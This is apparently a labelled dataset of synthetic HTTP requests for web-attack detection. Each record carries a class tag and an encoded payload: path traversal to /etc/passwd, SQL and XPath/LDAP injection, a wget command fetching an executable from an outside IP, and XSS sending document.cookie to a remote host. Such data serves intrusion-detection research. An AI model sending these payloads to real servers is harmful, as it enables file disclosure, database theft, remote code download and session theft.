Trailer: Max-Forwards
User-Agent: Mozilla/0.7 (compatible; dEedkre; Win 9x; 4TjEN)
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 673x399
Via: 3.3 www.nea5ttS.css, sywoe/1.4 19.129.86.156:6, 8.9 73.48.109.8
Transfer-Encoding: deflate
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 7714827508800
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44352
Start - Id: 36333
class: PathTransversal
GET /l2eGXxKLWG/wqbqee7ueee/uZGtVqVI4ZbcAr/rF7maSrD4KG@9ZS1uB/nUJRwkNK/thT9Iu9gdK4/l6diod.gif?omt=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&zprOcalibeqM=r8YV&Eqsozrt0nn=0544321382 HTTP/1.1
Host: www.aPxmtdnnev.st
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-2022-kr, windows-1252;q=0.3, euc-tw;q=0.1, cp-932;q=0.9
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.2
Cache-Control: max-age=6
Client-ip: 179.242.140.245
Cookie: tleDraroftytira=?ter;aotMlreXtPi1=nveTcb;RYlogK5jPtX2P=52246655
Cookie2: $Version="840"
Date: Fri, 04 Jun 04 01:43:18 UTC
ETag: "LNEkcsNTZJ_4--f"
Expect: 100-continue
From: aisg@6friP6nIal.st
If-Modified-Since: Thu, 07 Aug 08 12:20:52 GMT
If-Unmodified-Since: Wed, 04 Aug 04 22:13:08 CET
If-Match: "2brndKdCMduww7PH"
If-None-Match: *
If-Range: ".EK8LPwHe3nrwYsMSq"
Max-Forwards: 5394
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic b25sY29kb0o6d3dsaGVz
Authorization: NTLM dWVlN2U5Y2RoYmN0b2h0dGRlb21zbHRhMXQ4aG5zeW5yZWR0ZGJ0aA==
Range: 94941-674,-88804,1546-98301
Referer: /oaecuen.exe
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/2.7 (compatible; MSIE 2.7; Windows NT; yse4optd1u; issqtlcta; 9asye6Tno)
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 625x983
Via: 4.1 186.205.232.76:24, 7.7 www.dn6fiO3.png
Transfer-Encoding: gzip
Upgrade: itor/5.7, 4up4ta/3.2
Warning: 187 www.erlho.html "TnrEu" "Thu, 07 Sep 06 16:36:18 GMT"
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 876584717
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36333
Start - Id: 42189
class: SqlInjection
GET /c0/eossoma1apd2D/kTnGZJ2r1ds3P6Y/nbt6H/kLrexecV9%uXcC/bsypZX2t8kRkFSK3/rxQVOyzboM@GlPBD07/Iedd/tLWk/1q@iV2uf.EtJ/gl8N/cE.html?NwuA0aB.QOL_=epwdeisvtdx&dtepl=nHee0NeedIt&rumltntaisnuy=binaccept&Teaadie0mHrinA=83++++or++id%3E1+or+++ls_id%3C08701&l2g=a1lxtermecformb3inputsi&gnlb6jn5=srb%3D HTTP/1.0
Host: 182.234.19.72
Connection: scGntp
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tno-nxotI, n0amod-ihn4, u560diee-yaihc, fE-uee, emij-peaenIfz
Cache-Control: only-if-cached
Client-ip: 90.53.51.195
Cookie: 2_JW=070802157;isemen=o8;;y0eta4=646877805
Cookie2: $Version="31"
Date: Wed, 21 Oct 09 08:04:06 GMT
ETag: "HD6DB7u@yQJJkbe"
Expect: irpp0=cI1o9hea;esvtet
From: geah@hsnseiely.org
If-Modified-Since: Sat, 21 Feb 09 08:36:37 CET
If-Unmodified-Since: Mon, 21 Jan 08 09:22:38 CET
If-Match: "st-hDKC7W7609RQ7T3P"
If-None-Match: *
If-Range: Fri, 08 Jan 10 09:31:19 UTC
Max-Forwards: 19
MIME-Version: 4.5
Pragma: aaP1='8trhO'
Proxy-Authorization: rynRof iahsblar=Etalhl
Authorization: nhe4l io0s=4iluih
Range: 75-,-69,-978379
Referer: http://jghpmne.net/e0li/tfae/haoteq/r8zesn/iUhlmnte.jsp
TE: gzip;q=0.6,gzip
Trailer: Transfer-Encoding
User-Agent: qyl0Srhd (sc.Pwx.; pi2AABMSJ)
UA-CPU: StrongARM
UA-Disp: 466,6159,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x5537
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: o7cUT
Upgrade: ji40ad/7.5, ednwes/8.3, osi/1.7, eor/7.9
Warning: 601 194.137.96.43 "gotieoa7eticdpyar6l2" "Thu, 01 Mar 07 08:53:20 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 15953082
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42189
Start - Id: 43141
class: OsCommanding
GET /omhz8VEaFbQrR1/sMyEEN3bo/oacrsadeotfn7chh/iNo6IX6qDYfGFvb25G/raicnhlRoWt6/vfxdnnmmq6aedauctav4/agqqIGZ8gXPrePi..jpeg?ixpneinz=cMOrGclkPWS&nu8aeioHidp=%5Cn+++++wget+http%3A%2F%2F198.160.84.115%3A800%2Fnftp.exe&W4CY6M=telnetra%29t&Tm7ntlien3lstt4=tnegt8oeo&netzie=03_ HTTP/1.0
Host: 251.141.131.127
Connection: 7hakrA4n
Accept: image/*;q=0.8, text/*, application/*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate;q=0.8
Accept-Language: eTt6cwnt-dax
Cache-Control: t8cq='tAso5Oli'
Client-ip: 203.26.22.181
Cookie: mnnHro7=1;seetagllS=iUSZn;soveim=usNi;npyubfl8n=BEpoo5o4adt
Cookie2: $Version="11"
Date: Fri, 26 Oct 07 05:01:49 GMT
ETag: W/"1Bt5VxNgPIaefYNngm27"
Expect: riuusi2e=neiyivtb
From: ennl@eGwctOCzc.fr
If-Modified-Since: Wed, 27 Oct 04 01:09:11 UTC
If-Unmodified-Since: Sun, 20 Jun 04 05:58:13 UTC
If-Match: "J2aanYcaIyVZ7g5W"
If-None-Match: *
If-Range: Sun, 25 Jul 04 13:53:35 CET
Max-Forwards: 42
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: Digest realm
Range: 46359-,93372-15,76-
Referer: http://www.aodr.uk/0dikk/sjsln.php
TE: trailers,trailers
Trailer: Expect
User-Agent: tNikd54 (a6GcgyQ)
UA-CPU: Sparc
UA-Disp: 5887,6465,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 699x046
Via: FTP/3.1 www.ahgsg.jpeg:3, 1.3 www.peqv.shtml, 1.9 183.52.99.72
Transfer-Encoding: identity
Upgrade: irotn/6.8
Warning: 904 www.jerlys.js "mltO" 
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 197146981100118
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43141
Start - Id: 40948
class: SSI
GET /nECbHPeWZ.mspx?obcn=7gteao&q1ooHbiSh=33&0mifn=itatgieDiIfmrin3bt&7YSjB4=%3C%21--+++%23odbc+++connect%3D%22beeo%2Cte%2Ceagre%22++++++++statement%3D%22select++++*+from+++++t%22--%3E&me2sSurnvhina=mePPVQ4tpTC&itreti=%5Bwwget&Qna6@DZ6=iAT&inaimeclhTnpsth=nNF6&er=tt&ufs2e4daSYTofp=ed&taajoy=sr39mTAe&nosrwtodtc=ahi HTTP/1.1
Host: 10.84.196.127:79
Connection: keep-alive
Accept: text/*;q=0.4
Accept-Charset: euc-cn;q=0.9, iso-2022-jp, cp-932, windows-1258;q=0.1
Accept-Encoding: gzip;q=0.7
Accept-Language: t-immsaam;q=0.9, ErD7l-eur, e-kgheTxp9, exml-romftCst;q=0.7, eaew-zNs8isih
Cache-Control: no-store
Cookie2: $Version="7"
Date: Fri, 06 Jan 06 03:23:08 GMT
ETag: "x4FUphGSaCYYxv2zm0Nz"
Expect: 100-continue
If-Modified-Since: Sat, 15 Dec 07 10:03:11 UTC
If-Unmodified-Since: Wed, 30 Nov 05 15:23:46 GMT
If-Match: "Pi6lzpKpTKJrHtmq"
If-None-Match: *
If-Range: Tue, 10 Nov 09 10:49:41 UTC
Max-Forwards: 49
Pragma: cic=1sn
Proxy-Authorization: Digest uri=http://pubtmS.fr/cUdevTmc/neroi2.doc
Referer: http://www.jaorbeea.biz/Orrlsa0e/geqmueey.mspx
TE: trailers,chunked;q=0.4
User-Agent: uLwBI@p http://www.unfhx.be
UA-Disp: 7298,0311,16
UA-Color: color16
Via: 9.4 161.193.109.74, FTP/7.1 www.btunngsh.png
Transfer-Encoding: gzip

null

End - Id: 40948
Start - Id: 49406
class: XPathInjection
GET /tmtcOloEiltsrsis/vseo/ifehslgceIgahqsd8oyz/Glj3ROQadminR.nsf?hslsondeg6eei=Se%27++or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or++%27cd%27++%3D+++%27&Nu1hgndilegoTw=s%25rs&gisgatogadeth=rpe&Hdeln=97544&hezw=4858&4XM_qI=m22+disuiRU&hl=5732055&cDNKeE7nbodyqBc=6&eergslees=r7tf&CF.SV2DVs5=941351&Y1nliedeAue1n=connect%3E+fi HTTP/1.0
Host: www.aRnan.uk
Connection: keep-alive
Accept: video/quicktime, video/quicktime
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 81.222.19.244
Cookie: 8d1oil5=tsop1cry1y;aa5oeN8=367716408;ouodRdadnt=778;Ys8qiydNe=8t a2rinor4replace;Es@XNgTrsrnf=55
Cookie2: $Version="461"
Date: Mon, 19 Nov 07 08:00:12 GMT
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: a1tnai
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Sat, 27 Mar 04 09:12:39 CET
If-Unmodified-Since: Sun, 18 Jan 09 01:06:25 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Jul 05 19:04:47 GMT
Max-Forwards: 353
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM dWJzaGxuZXR5c3Nsbm5kdXJ6MHJkcjdhUmFkaGFqdGhpbnZobnNl
Authorization: o6hk nUnoo9=kdsnx
Range: 708062-
Referer: http://MncFTtr.st/itlrht/mjlesjWe/smnti.txt
TE: chunked;q=0.5,trailers
Trailer: If-Range
User-Agent: Mozilla/8.5 (Windows; U; Win 9x 0.7; e9-si; rv:9.2.6) Gecko/64404260
UA-CPU: StrongARM
UA-Disp: 1318,8014,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 0.4 www.rnel.jpg, culrLe/8.7 131.60.168.121
Transfer-Encoding: compress
Upgrade: shoq/5.8, ecn/2.0, sha/2.4
Warning: 573 www.w0le3ue.js:98108 "oaMintne07soeaotcrtl" 
X-Forwarded-For: 151.48.131.243
X-Serial-Number: 37054990
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49406
Start - Id: 36005
class: PathTransversal
POST /rq/eMmd-yW/euifu6ioseirnent/-UdMyf1QLpN/Iunx6nntodxdrtaOa/heep/OEJqvAscriptAdocument9/jaue/98HNYin.js? HTTP/1.1
Content-Length: 56
Content-Language: lenlb,cr,H7eahiwo
Content-Encoding: compress
Content-Location: http://www.giin.org/osleseSo.exe
Content-MD5: d284cmV5YTZlZGZyZUVucg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Oct 09 10:51:53 UTC
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: 226.206.36.147:0
Connection: close
Accept: video/*;q=0.6
Accept-Charset: iso-2022-kr, iso-10646-ucs-2;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: oriyt-8qt;q=0.6
Cache-Control: max-stale
Client-ip: 241.137.194.133
Cookie: ee3tn9s6smte8=dn8vtRbmtotah;ifnedhhotljgr=tossxilcrefn
Cookie2: $Version="232"
Date: Sun, 14 Dec 08 08:06:09 UTC
ETag: W/"WcuTKJ-E0lIjdULM"
Expect: ueoc69
From: vgkun@sTsiY.org
If-Modified-Since: Sun, 05 Dec 04 18:23:33 UTC
If-Unmodified-Since: Mon, 19 Jun 06 20:40:34 GMT
If-Match: "g3hSHF7eEkHdVD8"
If-None-Match: *
If-Range: Mon, 10 Dec 07 22:40:25 GMT
Max-Forwards: 5
MIME-Version: 5.1
Pragma: 8e='ql'
Proxy-Authorization: NTLM YXRlb2F1ZHJFMWhvaWVlbHJzTHRYZWU3MWRkb29nb3Q=
Authorization: Digest response="b001AD8663ac586b9BBEABDeE3bAF9ed"
Range: -22147
Referer: /neitt/eacr/oeMlatl/Lntn/pjLisoSr.php4
TE: trailers,gzip,chunked
Trailer: Accept
User-Agent: hcet/9.6.8
UA-CPU: Sparc
UA-Disp: 2185,9932,16
UA-OS: Win98
UA-Pixels: 551x993
Via: HTTP/6.7 www.aihiym.gif, nis9/2.3 140.29.51.181, FTP/0.6 180.25.204.39
Transfer-Encoding: utonch
Upgrade: 4tnu/7.8, odsAo/4.6, iuf/3.2
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 88.215.245.58
~~~~~: ~~~~~~~~~~

VctrJ1vT8pJI=g6ot&Gtosoe7=n&o8eoTd=\WINNT\system.ini

End - Id: 36005
Start - Id: 49130
class: XPathInjection
GET /6evaaetnmauuh7ae9d/29mn7lz/ri/eXnlR4beJZ0kmS/z3iI9_T/.Mlike5s/opt9uv61Ll4m/s1tyeACNotDsn.gif?5jsaeauq=bn%27%5D++%7C++++P++%7C+++++%2F%2Fuser%5B++++name%2Ftext%28++%29+++%3D+%27Ea&ariz=t2rdt9a HTTP/1.0
Host: www.Btlunp.org
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: cp-950;q=0.4, x-mac-turkish
Accept-Encoding: identity;q=0.0
Accept-Language: *
Cache-Control: oqf='r'
Client-ip: 245.30.28.231
Cookie: i99xrQw=wqsaunph-&irdelete;nel4cmda8;se6ipwoox4meoK=489;osyosOEt50lytq=nhev
Cookie2: $Version="35"
Date: Wed, 05 Sep 07 15:10:20 CET
ETag: W/"Tvi9KhEHOu0-YyM"
Expect: 100-continue
From: NktwIe@earsOsuo.org
If-Modified-Since: Sun, 08 Jan 06 05:00:50 GMT
If-Unmodified-Since: Wed, 23 Jun 04 17:39:39 UTC
If-Match: "8381p5QNphbGnxUvL"
If-None-Match: "3gGsHEizp5o84lx.mIAm"
If-Range: Thu, 27 May 04 14:10:12 UTC
Max-Forwards: 87
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic YWFpZDpkYW90YW5q
Authorization: Basic MGVCSWVvUHA6aWhoYWQ=
Range: 137110-8612,-4,90364-3
Referer: /uorotrn/uy9hon.msf
TE: gzip;q=0.4,deflate
Trailer: Host
User-Agent: Mozilla/7.9 (Windows; U; WinNT 2.6; un-du; rv:2.6.4) Gecko/68140172
UA-CPU: MIPS
UA-Disp: 3801,296,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 793x723
Via: HTTP/4.6 www.wajihmer.css
Transfer-Encoding: sois
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 387 www.5rttc.html "iatlob" 
X-Forwarded-For: 91.195.205.35
X-Serial-Number: 017399203750342
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49130
Start - Id: 37046
class: LdapInjection
GET /ciotrsviikao/5eOIlaAkv0/dY/keteoih1t2l.mdb?h7irN9tpEitrro=%29+++%28+%7C%28++cn%3D*o+%27brien*%29%28mail++++%3D*o++%27brien*+%29+ HTTP/1.0
Host: www.nnrwdnk.com:8
Connection: keep-alive
Accept: application/*
Accept-Charset: us-ascii;q=0.8, euc-kr;q=0.9, windows-1251
Accept-Encoding: gzip, identity
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 188.212.178.172
Cookie: nolwh8tlw=var9hbsilotthaaa;hHhGV3mp=xsam7oss
Cookie2: $Version="4"
Date: Tue, 31 Oct 06 01:18:25 GMT
ETag: "Dpb8_1olE.nLz3YRQbPu"
Expect: mly5a=blmtutlt
From: tJpe@htd4aess.biz
If-Modified-Since: Tue, 05 Oct 04 14:04:18 UTC
If-Unmodified-Since: Tue, 27 Jan 09 16:23:36 CET
If-Match: *
If-None-Match: "jfyHLU6IO4Nk2Rqe"
If-Range: "nFLIjUeH7XGYUQ1pvTi"
Max-Forwards: 76
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Basic ZHR0THRsOnIxeTNlcg==
Range: 5-21,-51,0162-
Referer: /jseeUb8.conf
TE: chunked,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/6.4 (Machintosh; U; PPC Mac OS X 5.3; 2i-qC; rv:6.1.7) Gecko/91316589
UA-CPU: 68000
UA-Disp: 370,042,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: 9.8 34.146.181.145
Transfer-Encoding: gzip
Upgrade: nopuat/4.5
Warning: 055 85.124.104.165 "iraNbtdtn5hudtyn" 
X-Forwarded-For: 143.102.250.73
X-Serial-Number: 595061014884085769
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37046
Start - Id: 36302
class: PathTransversal
GET /Aformhtaccess_documentbkx/updateNI8FmyWw7Xchild/sBm1_/rnF/u39rop/Ap.gif?nt=7&fA=8&mni6jtoaYia=sf8s&3yB4=33&liteIjotbdahct=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&2Sf=eskbw1pmazY HTTP/1.1
Host: 79.8.59.92:80
Connection: gsuetfw
Accept: */*
Accept-Charset: euc-kr;q=0.3, windows-1251;q=0.8, x-mac-chinesesimp;q=0.9, x-mac-japanese, iso-8859-6;q=0.8
Accept-Encoding: deflate, gzip;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 173.42.72.46
Cookie: aeohhr=a -;deaehsrra=9968;alea43m=[>lib;cjdfmah=dnD\
Cookie2: $Version="878"
Date: Sat, 29 Nov 08 17:36:09 GMT
ETag: W/"_CMpMj-5Yq9_H_Af87"
Expect: 100-continue
From: Ai3uSa@urpega.be
If-Modified-Since: Fri, 30 Oct 09 11:07:23 GMT
If-Unmodified-Since: Thu, 29 Dec 05 17:09:05 GMT
If-Match: "pV61aumhgieINFT"
If-None-Match: *
If-Range: Mon, 14 Mar 05 10:45:32 CET
Max-Forwards: 1
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic dWRVMWF0QWg6bnlwc3Q0ag==
Authorization: Digest realm
Range: 9-463
Referer: /pnvnoxat/reu0apl.jsp
TE: deflate;q=0.8,deflate,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/6.0 (Windows; U; WinNT 6.1; wq-t2; rv:7.3.6) Gecko/64432333
UA-CPU: MIPS
UA-Disp: 505,9391,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: 7.8 140.247.82.156:56420
Transfer-Encoding: gzip
Upgrade: oafi/4.5
Warning: 925 www.seESe.gif "aoh3bha8hrc" 
X-Forwarded-For: 142.213.134.120
X-Serial-Number: 50534394193049437616
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36302
Start - Id: 47785
class: XSS
GET /egis3nNgte63/m.FoXr3/mSaK96CdYgPT/hG.iAtrb.php4?JaOg=446&msnpc9at=eyw%29n&cqdo3eTtaabru=%3Cstyle%3E%3C%21--%3C%2Fstyle+%3E%3Cscript+%3E%5Balert+%28%27Hsnez%27%29%3B%5D%2F%2F--%3E%3C%2Fscript++++%3E HTTP/1.1
Host: 136.98.15.90
Connection: close
Accept: video/*;q=0.6, audio/x-wav
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 226.38.61.226
Cookie: egn1hliaee=uyivht9ahiIia4;iGmHo=snDbnrdm
Cookie2: $Version="908"
Date: Tue, 27 May 08 20:41:11 CET
ETag: W/"24PXDJcX3yUAeSMko"
Expect: tese=ojdN1;xeEsf
From: dRkiaeue@o6si.cz
If-Modified-Since: Thu, 19 May 05 02:03:23 CET
If-Unmodified-Since: Sat, 09 Apr 05 24:40:00 UTC
If-Match: *
If-None-Match: "58MJ1jIeIYKqDDZ5pe9"
If-Range: Fri, 09 May 08 03:24:48 GMT
Max-Forwards: 25
MIME-Version: 8.5
Pragma: itl9loht=bubk
Proxy-Authorization: NTLM VzNldEEyM3IzZXQzZGRicm9GeWRwaHN0c252aGRFaGY0
Authorization: Basic dGlZaTZSejpldG80aG5w
Range: 9830-
Referer: http://U8ralss.ch/mcOles/side/one5io.gif
TE: chunked;q=0.0,deflate;q=0.1,trailers
Trailer: Accept-Language
User-Agent: otNn (eeQXzj@; wDWI9w0; rBcILWwHCZ; 7Za@XdCb)
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7737x1025
Via: 0.0 www.nmgez.gif:89, 2.4 www.oech.gif, 7.5 72.89.150.186:778
Transfer-Encoding: onrchn; lsJnsa=0uy1oih
Upgrade: zbercb/3.5, lhe1/8.6, HsR/8.3, ne6enE/3.6
Warning: 264 239.66.183.33 "kes2a" 
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47785
Start - Id: 36102
class: PathTransversal
GET /timv.fhvsy6vAK.Q.html?rryni=phr%3A&qSjefuitXsE=89428&dEr9eg=likee&6uu5S7nfl=sxsa6ee4se&hi=0yUPM.P&edil7neOpmir=0&tl1brosmdef=59828153&P0aJTN_jUlkwp-=o%3A%5Cautoexec.bat&hho3sdoibtk6=dMj&9sniet1tdu5ynw0=telnetlop%3Fieh%3Bxsam%2Ba0i HTTP/1.0
Host: 137.2.224.0:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, deflate;q=0.0, gzip, deflate;q=0.6, compress;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 100.85.62.104
Cookie: ahadotoetee=0060;Ae9aT=hXx3Sc5rAjj;neuoeenieeec=eaeuhtr5a;hpo=gL.RCWJhZ4p6;tesiIhdge=Acgw 
Cookie2: $Version="1"
Date: Tue, 24 Jul 07 17:24:54 GMT
ETag: W/"Og53tD5Fr.sQ6S3"
Expect: 100-continue
From: lemgP@orThcs1lso.de
If-Modified-Since: Sat, 28 Jun 08 08:56:47 GMT
If-Unmodified-Since: Sat, 24 Nov 07 01:33:51 UTC
If-Match: "i13_ZsfT4xmT9MZS"
If-None-Match: "DMex6@y6MjYiwmNwqB"
If-Range: Mon, 19 Dec 05 23:31:09 CET
Max-Forwards: 098
MIME-Version: 3.5
Pragma: xs=t
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: NTLM dGZlbmxhZWxjclRzQVBkaGVpZXNzbWV1ZmlUdW9yM2NpNWhucDN1bnRl
Range: 78-
Referer: http://www.rn96el.st/3snee.mdb
TE: trailers,trailers
Trailer: If-Match
User-Agent: iT@_62 http://www.hWbhsesa.uk
UA-CPU: Sparc
UA-Disp: 9693,338,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8256x1298
Via: uted/1.8 129.106.38.238:5227
Transfer-Encoding: deflate
Upgrade: 67dhst/7.8, R8rath/7.7, ln3g/6.6
Warning: 505 www.e3nDj.jpeg:48661 "atsjlrarlaaa" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 5507795373725385751
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36102
Start - Id: 41922
class: SqlInjection
GET /hMVv486H2x/lw/mtertktwaToeejovllea/d9xXekUou.VNHa/6O/aFqFBV8BKt1.dlsnl7.mspx?Ymeli5cxaoe8hn=%25esbD+Hj&9pinkso2t=96283&b0iknyeo8c=0&ishitesei=95338&m8d=j0y3G9rZUY&w0HY=giUsqxCl&bs=eNdocument+svtdneut1cio&4pM61zq=oiasgitvyah&eer=cosw2j%27+++UNION++++%2F**%2F+++SELECT+++++snlees+++FROM+++dba_users+WHERE+++leltyni++++like+++++%27%2525&jtoataedesfn=ek&eessat5n=0599&1tEhrioeAedgseo=0&3tr=s&LYsamvQ=rplaienn3bbadgfhte HTTP/1.1
Host: www.ueytlcjg.uk
Connection: close
Accept: */*
Accept-Charset: iso-8859-15
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=8
Client-ip: 21.123.50.241
Cookie: tdtusaiarf=abe~>;gitcsUVIaa1otf=$ei$y
Cookie2: $Version="615"
Date: Sat, 23 May 09 24:12:21 UTC
ETag: "o4V4NB.J9gXaYf8twh"
Expect: ywWtykim
From: usDda@iceeiIo.gov
If-Modified-Since: Fri, 20 Jul 07 15:35:46 GMT
If-Unmodified-Since: Wed, 27 Jul 05 06:35:45 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 18 Apr 09 13:12:21 UTC
Max-Forwards: 17
MIME-Version: 9.6
Pragma: crrl='entsn5t'
Proxy-Authorization: Digest realm
Authorization: Digest qop=auth
Range: -0
Referer: /tt7pD/ctuIae/i0mN/bdbbt/de0evasa.rar
TE: deflate;q=0.9,trailers,chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: reOxdeiSEkedkaj
UA-CPU: 68000
UA-Disp: 421,960,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9010x724
Via: FTP/6.7 www.hh2Uh.jpg, undh/1.9 www.aehoss.jpg:92933, 7.8 www.rIp3ftA.tiff
Transfer-Encoding: identity
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 941 www.opH3rr.tiff "cssrqn2d5ar9lsne3" "Mon, 23 May 05 22:26:08 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41922
Start - Id: 47541
class: XSS
GET /msbp49r/lei3otxRhE8l/9nxoealop17Myhe9en/lmucSbsuiNq.png?2OjKYVmailz=796&yt0pro=1&1ZWk9=207447420&mfsw8DoNnoitwyn=%3Cdiv+++++style++%3D++++%22+++background-image%3A+++++url%28javascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F60.170.193.35%2Filnest.dll%27%2Bdocument.cookie%29%3B%5D%29%3B++%22+%3E&feeehsaoc=e12YnN6&b0=0472598&z_qqg9=91181952&Us=log&Rbtnjh5nesttEar=IenC&rr7sinaFhl=i&aceEeOzep=oArs HTTP/1.1
Host: 97.173.207.248:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: euc-tw, hz-gb-2312;q=0.8
Accept-Encoding: 
Accept-Language: vtpcA-hgierfl;q=0.7, eiaekoh-0
Cache-Control: only-if-cached
Client-ip: 32.10.53.131
Cookie: sl0R=l8l3iMr;amEjrms=liRRdlaWkfmtDcqh;l1Usshutdown=64258;a9aln=rf.;htOexec=3470848
Cookie2: $Version="5"
Date: Wed, 08 Aug 07 03:25:44 CET
ETag: W/"-8EWg2bxNrKypcnLrILK"
Expect: Aaakre3t=bPm8Duh;h4pbg6
From: sevLsg9@hooNmu.fr
If-Modified-Since: Mon, 13 Mar 06 22:45:17 CET
If-Unmodified-Since: Thu, 01 Jan 09 02:05:55 GMT
If-Match: "SlYExWD.61oQyU7SHA"
If-None-Match: "nlPvheeUYn6NMvD."
If-Range: Sun, 21 Sep 08 21:52:12 UTC
Max-Forwards: 58
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="zlsmsen9"
Authorization: bMhsg esQt=Vnate6
Range: 8094-,77-91254,-8945
Referer: http://www.pv4jt2ea.com/unYndii/nncrusg/Adm2s6te/7bch3b/Eyemo0.asp
TE: chunked
Trailer: If-None-Match
User-Agent: tjgUnuv@mN http://www.ydae.fr
UA-CPU: PowerPC
UA-Disp: 050,2452,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2187x3503
Via: nee2iV/8.8 www.lsure.tiff, 1.4 253.238.240.73
Transfer-Encoding: deflate
Upgrade: ehzL/0.2, mtlah/0.2, jsco/5.4, toi/4.5
Warning: 992 www.4eiian.js "meeteeolpwgufO" "Tue, 02 Mar 10 02:39:00 CET"
X-Forwarded-For: 112.231.125.157
X-Serial-Number: 870651819
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47541
Start - Id: 45395
class: PathTransversal
